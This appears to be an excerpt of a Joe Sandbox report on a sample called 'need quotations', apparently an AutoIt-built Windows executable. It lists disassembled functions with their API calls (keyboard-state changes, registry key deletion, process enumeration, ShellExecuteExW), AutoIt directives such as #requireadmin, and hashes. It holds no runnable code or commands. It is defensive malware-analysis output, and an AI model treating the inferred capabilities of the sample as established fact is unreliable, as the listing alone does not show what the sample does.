LeaveCriticalSection.KERNEL32(8000000C), ref: 0026AA39

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
String ID:
API String ID: 1422805418-0
Opcode ID: 93578368e3b127438ff4e96814da76f8e90b189d2162704763a013003ef4f1ac
Instruction ID: 79c90dfb5a8ffeab62621a30dc030b25ff3a9d36e132d6de571a8de247169687
Opcode Fuzzy Hash: 93578368e3b127438ff4e96814da76f8e90b189d2162704763a013003ef4f1ac
Instruction Fuzzy Hash: C8414B719212069BEB149FA8DA4475CB7B4BF01334F20832AE525BB2E1D7749CE0CF92

Function 002A8ECC Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 002A8EE4
GetDC.USER32(00000000), ref: 002A8EEC
GetDeviceCaps.GDI32(00000000,0000005A), ref: 002A8EF7
ReleaseDC.USER32(00000000,00000000), ref: 002A8F03
CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 002A8F3F
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 002A8F50
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,002ABD19,?,?,000000FF,00000000,?,000000FF,?), ref: 002A8F8A
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 002A8FAA

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: a29fffb8b73510bc6e10dfef98fa5e8219765ede5999e945b5a957c8959b7e8a
Instruction ID: 86022f6d91acdf5c0341fad9d743e7605c07d630bf82cf7e6436d37b27fbcf2d
Opcode Fuzzy Hash: a29fffb8b73510bc6e10dfef98fa5e8219765ede5999e945b5a957c8959b7e8a
Instruction Fuzzy Hash: C4318E72200214BFEB108F54EC4AFEB3BADEF4A715F044065FE49DA291CAB59851CBB4

Function 002B0133 Relevance: 10.7, APIs: 7, Instructions: 245windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0025B34E: GetWindowLongW.USER32(?,000000EB), ref: 0025B35F

GetSystemMetrics.USER32(0000000F), ref: 002B016D
MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 002B038D
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 002B03AB
InvalidateRect.USER32(?,00000000,00000001,?), ref: 002B03D6
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 002B03FF
ShowWindow.USER32(00000003,00000000), ref: 002B0421
DefDlgProcW.USER32(?,00000005,?,?), ref: 002B0440

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
String ID:
API String ID: 3356174886-0
Opcode ID: b43fe71b5cdc9d8e422cfcc766d9cc0fede02ded271dce9ca342ecf755c7798a
Instruction ID: 36f1e241c2949270b0df008cc358e4bc977b9a3ac9010824ba817385a1c2868e
Opcode Fuzzy Hash: b43fe71b5cdc9d8e422cfcc766d9cc0fede02ded271dce9ca342ecf755c7798a
Instruction Fuzzy Hash: 45A18E3561061AEFDB19CF68C9C9BEEBBB1BF08780F148165EC54A7290D774AD60CB90

Function 0025AE78 Relevance: 10.7, APIs: 7, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9c468a114294bfad64b6279e5c7f39e0d533e5f020fbc3ff0ae50522e036378
Instruction ID: b03bd681936e26b00dafbde91c095b2b8fcf924ade838812476310a41df4d0c5
Opcode Fuzzy Hash: a9c468a114294bfad64b6279e5c7f39e0d533e5f020fbc3ff0ae50522e036378
Instruction Fuzzy Hash: C2717BB0910109EFCB14CF98CC8AAFEBB74FF85315F248259F915A6251C331AA65CFA5

Function 002A2230 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 002A225A
_memset.LIBCMT ref: 002A2323
ShellExecuteExW.SHELL32(?), ref: 002A2368

Part of subcall function 0024936C: __swprintf.LIBCMT ref: 002493AB
Part of subcall function 0024936C: __itow.LIBCMT ref: 002493DF

Part of subcall function 0025C6F4: _wcscpy.LIBCMT ref: 0025C717

CloseHandle.KERNEL32(00000000), ref: 002A242F
FreeLibrary.KERNEL32(00000000), ref: 002A243E

Strings

@, xrefs: 002A2334

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
String ID: @
API String ID: 4082843840-2766056989
Opcode ID: 9fc26beca36139371022b9602b9d7d49de52b1b521ef5a268aadcb69977ebdf5
Instruction ID: c41e34cac7051e39b6b975f0cb33a5b104b94b95ff658924572f3bc5b87cd5a5
Opcode Fuzzy Hash: 9fc26beca36139371022b9602b9d7d49de52b1b521ef5a268aadcb69977ebdf5
Instruction Fuzzy Hash: 6B716B70A20619DFCF14EFA8C88599EBBB5FF49710F108459E846AB391CB30AD64CF94

Function 00283DA8 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00283DE7
GetKeyboardState.USER32(?), ref: 00283DFC
SetKeyboardState.USER32(?), ref: 00283E5D
PostMessageW.USER32(?,00000101,00000010,?), ref: 00283E8B
PostMessageW.USER32(?,00000101,00000011,?), ref: 00283EAA
PostMessageW.USER32(?,00000101,00000012,?), ref: 00283EF0
PostMessageW.USER32(?,00000101,0000005B,?), ref: 00283F13

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 13ae26a69aef65ec4aba239d5f841dd59f2a364131c876ed8850795b8499dde5
Instruction ID: d6145b871ba4d82157fe2762f977be931f2f58f9fbd61ca42810b4faedf960c1
Opcode Fuzzy Hash: 13ae26a69aef65ec4aba239d5f841dd59f2a364131c876ed8850795b8499dde5
Instruction Fuzzy Hash: 4C5126646253C23EFB36AB348C09BB67EA95F06B04F084488F1D5468C3D3D8AEE4D750

Function 00283BC3 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00283C02
GetKeyboardState.USER32(?), ref: 00283C17
SetKeyboardState.USER32(?), ref: 00283C78
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00283CA4
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00283CC1
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00283D05
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00283D26

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: b648ed6d61ca85779ff1c56daba49b54cfe67d3585a56d9963307ecfac2d9a67
Instruction ID: 2085a20ac95d75c2ef57d82745a9fef52fca1dbd12b7cf32213cb8f6cc3a1124
Opcode Fuzzy Hash: b648ed6d61ca85779ff1c56daba49b54cfe67d3585a56d9963307ecfac2d9a67
Instruction Fuzzy Hash: 1A5149A45267D73DFB32EB34CC45B7ABF986B06B00F0C8489E0C55A8C2D294EEA4D750

Function 00287DB1 Relevance: 10.6, APIs: 7, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00287DBE
_wcsncpy.LIBCMT ref: 00287DF3
_wcsncpy.LIBCMT ref: 00287E25
_wcsncpy.LIBCMT ref: 00287E58
_wcsncpy.LIBCMT ref: 00287E9A
_wcsncpy.LIBCMT ref: 00287ED4
_wcsncpy.LIBCMT ref: 00287F03

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: bb584ee7e13d6d1a0be23015f87d019414a1ee200aa9fe6743f33f91970a79d1
Instruction ID: ac71ce5fc44b2f82a766c7a9342ae04985d7023417a230b8c51dffb84d04bdaa
Opcode Fuzzy Hash: bb584ee7e13d6d1a0be23015f87d019414a1ee200aa9fe6743f33f91970a79d1
Instruction Fuzzy Hash: 6A41736AC31214B6CB10EBF4C886ACFB3AC9F14310F5489A6E508E31A1F634E674C7A5

Function 002A3D72 Relevance: 10.6, APIs: 7, Instructions: 100registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 002A3DA1
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 002A3DCB
FreeLibrary.KERNEL32(00000000), ref: 002A3E80

Part of subcall function 002A3D72: RegCloseKey.ADVAPI32(?), ref: 002A3DE8
Part of subcall function 002A3D72: FreeLibrary.KERNEL32(?), ref: 002A3E3A
Part of subcall function 002A3D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 002A3E5D

RegDeleteKeyW.ADVAPI32(?,?), ref: 002A3E25

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: ee9832e32df68c28ea7f9acb48bcba7a4eac4f43e9d7fb565f913b6e2d7714f7
Instruction ID: ff753f3e61c75097ddee501875ddf6018648d25fde9adf49786855d912ccbfcb
Opcode Fuzzy Hash: ee9832e32df68c28ea7f9acb48bcba7a4eac4f43e9d7fb565f913b6e2d7714f7
Instruction Fuzzy Hash: 6631B9B1911109BFDB15DF94ED89EFFB7BCEF09300F00016AB512A2151DA749F599BA0

Function 002A8FC8 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 002A8FE7
GetWindowLongW.USER32(016FFDD0,000000F0), ref: 002A901A
GetWindowLongW.USER32(016FFDD0,000000F0), ref: 002A904F
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 002A9081
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 002A90AB
GetWindowLongW.USER32(00000000,000000F0), ref: 002A90BC
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 002A90D6

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 328c8f7318e027942e762c71c34f9308b4adb770c707168de7131240f7684f31
Instruction ID: fc5b982c3ca3a28db77dc344f744812caf7d4b2fb691e0e2d2915ff26fdb7a2e
Opcode Fuzzy Hash: 328c8f7318e027942e762c71c34f9308b4adb770c707168de7131240f7684f31
Instruction Fuzzy Hash: 863135346102169FDB21CF59EC88F6477A9FB4A354F154165FA198B2B1CFB2A890CB40

Function 002808AF Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002808F2
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00280918
SysAllocString.OLEAUT32(00000000), ref: 0028091B
SysAllocString.OLEAUT32(?), ref: 00280939
SysFreeString.OLEAUT32(?), ref: 00280942
StringFromGUID2.OLE32(?,?,00000028), ref: 00280967
SysAllocString.OLEAUT32(?), ref: 00280975

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 8682fbc5a05a3b71afa12250c0695c6a6b445536ed29f2378e7a502fe553c906
Instruction ID: 5920a4888707d3dc829f41c40d9af19d7253ca89a863680d8da0c732c254fe38
Opcode Fuzzy Hash: 8682fbc5a05a3b71afa12250c0695c6a6b445536ed29f2378e7a502fe553c906
Instruction Fuzzy Hash: 5C21B576611209AFAB50AF68DC88DAB73ACEB08760B008525F919DB191D670EC498B60

Function 00282472 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00282485
__wcsnicmp.LIBCMT ref: 002824A6
__wcsnicmp.LIBCMT ref: 002824C0

Strings

#OnAutoItStartRegister, xrefs: 002824BA
#notrayicon, xrefs: 0028247D
#requireadmin, xrefs: 002824A0

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: a7a87b2a5a7065540635de010cb3c38e3b0c6782cfcadd02d80bd0b7ba69d373
Instruction ID: 5aa4b9f6e574defd34d5f32c3bbd20ca4dfaab862f3d6d5b75e31b8805bb14c3
Opcode Fuzzy Hash: a7a87b2a5a7065540635de010cb3c38e3b0c6782cfcadd02d80bd0b7ba69d373
Instruction Fuzzy Hash: 0B217C76172612F7D334BA348C12E777399EF65301FA08026F845A71C1E6A59DBAC3A4

Function 00280986 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002809CB
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002809F1
SysAllocString.OLEAUT32(00000000), ref: 002809F4
SysAllocString.OLEAUT32 ref: 00280A15
SysFreeString.OLEAUT32 ref: 00280A1E
StringFromGUID2.OLE32(?,?,00000028), ref: 00280A38
SysAllocString.OLEAUT32(?), ref: 00280A46

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 7783f92b6d26ee391d914e5ae764e1a909289623f0f1739a1bce069b680c7751
Instruction ID: 2364dae106a0336eeeb639fc0c5256f3db741ef7ee0d736bbd670dfebccf777f
Opcode Fuzzy Hash: 7783f92b6d26ee391d914e5ae764e1a909289623f0f1739a1bce069b680c7751
Instruction Fuzzy Hash: FE217779211205AFDB54EFA8DCC8D7A77ECEF093607408135FA09CB1A1E670EC558B54

Function 002AA2C8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0025D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0025D1BA
Part of subcall function 0025D17C: GetStockObject.GDI32(00000011), ref: 0025D1CE
Part of subcall function 0025D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0025D1D8

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 002AA32D
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 002AA33A
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 002AA345
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 002AA354
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 002AA360

Strings

Msctls_Progress32, xrefs: 002AA2FE

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 21ca4ef339de6a2539f556267b916fcc6c537e79525e1f9b62e5d4546d35e7bc
Instruction ID: 9f3b2f3ead2581577da0da1f2ea3ae1f647297afe409f10eabdc4296f1992fe1
Opcode Fuzzy Hash: 21ca4ef339de6a2539f556267b916fcc6c537e79525e1f9b62e5d4546d35e7bc
Instruction Fuzzy Hash: E7115EB1560219BFEF159F64CC85EEB7F6DEF09798F014115BA08A60A0CB729C21DBA4

Function 0025CCCD Relevance: 9.3, APIs: 6, Instructions: 253COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 0025CCF6
GetWindowRect.USER32(?,?), ref: 0025CD37
ScreenToClient.USER32(?,?), ref: 0025CD5F
GetClientRect.USER32(?,?), ref: 0025CE8C
GetWindowRect.USER32(?,?), ref: 0025CEA5

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 4b9aef85cbc52f420075901d0aa24327eacc0ca59fe2bcf1bdec760f710358c3
Instruction ID: 6016667210d21d020049b69e866717dd9dad67a700f2b5c1f3ced29e01cd89f2
Opcode Fuzzy Hash: 4b9aef85cbc52f420075901d0aa24327eacc0ca59fe2bcf1bdec760f710358c3
Instruction Fuzzy Hash: B1B1397992024ADFDF10CFA8C4857EDB7B1FF08340F259529EC59AB250EB70A964CB58

Function 002A1BDF Relevance: 9.2, APIs: 6, Instructions: 163processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 002A1C18
Process32FirstW.KERNEL32(00000000,?), ref: 002A1C26
__wsplitpath.LIBCMT ref: 002A1C54

Part of subcall function 00261DFC: __wsplitpath_helper.LIBCMT ref: 00261E3C

_wcscat.LIBCMT ref: 002A1C69
Process32NextW.KERNEL32(00000000,?), ref: 002A1CDF
CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 002A1CF1

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
String ID:
API String ID: 1380811348-0
Opcode ID: e4677765380fc9325de08a73fd83740c72e20940dd4b097904379b09baef82db
Instruction ID: c2eda77ca0d30f23dca4acafa2a9232eed07d68df2a69b19f645630461e89967
Opcode Fuzzy Hash: e4677765380fc9325de08a73fd83740c72e20940dd4b097904379b09baef82db
Instruction Fuzzy Hash: 03518F711143409FD724EF24D885EABB7ECEF88754F00492EF98997291EB70E924CB92

Function 002A2FD6 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON

Download Yara Rule

APIs

Part of subcall function 002A3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,002A2BB5,?,?), ref: 002A3C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002A30AF
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 002A30EF
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 002A3112
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 002A313B
RegCloseKey.ADVAPI32(?,?,00000000), ref: 002A317E
RegCloseKey.ADVAPI32(00000000), ref: 002A318B

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
